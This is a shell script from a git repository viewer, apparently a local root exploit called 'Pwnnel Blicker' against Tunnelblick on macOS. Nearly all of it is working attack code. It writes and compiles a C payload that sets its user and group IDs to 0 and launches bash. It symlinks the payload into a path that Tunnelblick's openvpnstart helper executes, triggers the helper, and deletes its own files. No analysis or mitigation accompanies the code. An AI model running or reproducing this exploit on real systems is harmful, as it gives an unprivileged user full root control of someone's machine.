blob: 9eb2c73c1204e7b52e8fdbab774d791e4987fa24 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
|
#!/bin/sh
#### Pwnnel Blicker ####
# for kids #
# #
# zx2c4 #
# #
########################
# This is another exploit for Tunnel Blick.
# Other exploits for Tunnel Blick are available here:
# http://git.zx2c4.com/Pwnnel-Blicker/tree/
echo "[+] Making vulnerable directory."
mkdir -pv /tmp/pwn/openvpn/openvpn-0
echo "[+] Preparing payload."
cat > /tmp/pwn/root.c <<_EOF
#include <unistd.h>
#include <sys/stat.h>
#include <stdio.h>
int main()
{
printf("[+] Cleaning up.\n");
system("rm -rfv /tmp/pwn");
printf("[+] Getting root.\n");
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
}
_EOF
gcc -o /tmp/pwn/root /tmp/pwn/root.c
echo "[+] Creating symlinks."
ln -s -v -f /tmp/pwn/root /tmp/pwn/openvpn/openvpn-0/openvpn
ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
echo "[+] Triggering vulnerable program."
exec /tmp/pwn/start OpenVPNInfo 0
|